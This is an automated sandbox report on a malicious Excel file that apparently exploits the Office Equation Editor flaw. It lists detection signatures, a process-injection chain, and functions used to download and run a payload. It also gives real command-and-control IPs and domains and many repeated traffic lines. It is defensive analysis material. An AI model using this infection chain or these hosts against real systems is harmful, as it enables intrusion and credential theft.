Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IND24072113.xlsx

Overview

General Information

Sample name:IND24072113.xlsx
Analysis ID:1539299
MD5:22d0a21eddbb4653bd17a2661616c83d
SHA1:2e63451d91b759c83f5ade2a461a8db913d9a06d
SHA256:7aa5dd9473b19ca966efa3964d26773ea6d5c479debffd5d9233b16b05324d67
Tags:xlsxuser-TeamDreier
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Contains functionality to detect sleep reduction / modifications
Document exploit detected (process start blacklist hit)
Found direct / indirect Syscall (likely to bypass EDR)
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3292 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3448 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • word.exe (PID: 3600 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: A6BF416D4380AEA9DAF376E06878F0F7)
        • svchost.exe (PID: 3636 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
          • uAjPOONiWk.exe (PID: 652 cmdline: "C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • msinfo32.exe (PID: 3676 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5F2122888583347C9B81724CF169EFC6)
              • uAjPOONiWk.exe (PID: 1696 cmdline: "C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 3908 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1bb:$s1: <legacyDrawing r:id="
  • 0x1e3:$s2: <oleObject progId="
  • 0x238:$s3: autoLoad="true"

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.255.145, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3448, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3448, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exe

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3448, Protocol: tcp, SourceIp: 192.3.255.145, SourceIsIpv6: false, SourcePort: 80
Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\word.exe, NewProcessName: C:\Users\user\AppData\Roaming\word.exe, OriginalFileName: C:\Users\user\AppData\Roaming\word.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3448, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3600, ProcessName: word.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\word.exe, NewProcessName: C:\Users\user\AppData\Roaming\word.exe, OriginalFileName: C:\Users\user\AppData\Roaming\word.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3448, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3600, ProcessName: word.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\word.exe, ParentImage: C:\Users\user\AppData\Roaming\word.exe, ParentProcessId: 3600, ParentProcessName: word.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3636, ProcessName: svchost.exe
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3448, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\word.exe, ParentImage: C:\Users\user\AppData\Roaming\word.exe, ParentProcessId: 3600, ParentProcessName: word.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3636, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: IND24072113.xlsxAvira: detected
Source: IND24072113.xlsxReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\word.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exeJoe Sandbox ML: detected

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.255.145 Port: 80Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.255.145 Port: 443Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.3.255.145:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: Binary string: msinfo32.pdb source: svchost.exe, 00000006.00000003.490616533.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000003.484856022.00000000006B5000.00000004.00000001.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639642478.00000000006DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: msinfo32.pdb@ source: svchost.exe, 00000006.00000003.490616533.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000003.484856022.00000000006B5000.00000004.00000001.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639642478.00000000006DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uAjPOONiWk.exe, 00000007.00000000.481547931.00000000008DE000.00000002.00000001.01000000.00000005.sdmp, uAjPOONiWk.exe, 00000009.00000002.639603944.00000000008DE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdb source: word.exe, 00000005.00000003.429340915.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, word.exe, 00000005.00000003.428942724.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.497270850.0000000000870000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.479680462.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.497270850.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.479390301.0000000000450000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.498304702.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.498006894.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639750700.0000000002270000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639750700.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: msinfo32.exe, 00000008.00000002.639902126.000000000299C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639530114.00000000002D6000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000009.00000000.510508746.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.552686971.000000000139C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452126
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,5_2_0045C999
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,5_2_00436ADE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00434BEE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,5_2_00436D2D
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442E1F
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045DD7C FindFirstFileW,FindClose,5_2_0045DD7C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD29
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00475FE5
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8D

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03601822 LoadLibraryW,2_2_03601822
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036018E6 WinExec,ExitProcess,2_2_036018E6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0360189B URLDownloadToFileW,2_2_0360189B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03601906 ExitProcess,2_2_03601906
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0360183C URLDownloadToFileW,2_2_0360183C
Source: global trafficDNS query: name: timurtrading.my
Source: global trafficDNS query: name: www.omnibizlux.biz
Source: global trafficDNS query: name: www.sqlite.org
Source: global trafficDNS query: name: www.sqlite.org
Source: global trafficDNS query: name: www.75e296qdx.top
Source: global trafficDNS query: name: www.myprefpal.xyz
Source: global trafficDNS query: name: www.jilifish.win
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 167.172.133.32:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 45.33.6.223:80
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 185.196.10.234:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 3.33.130.190:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 15.197.148.33:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
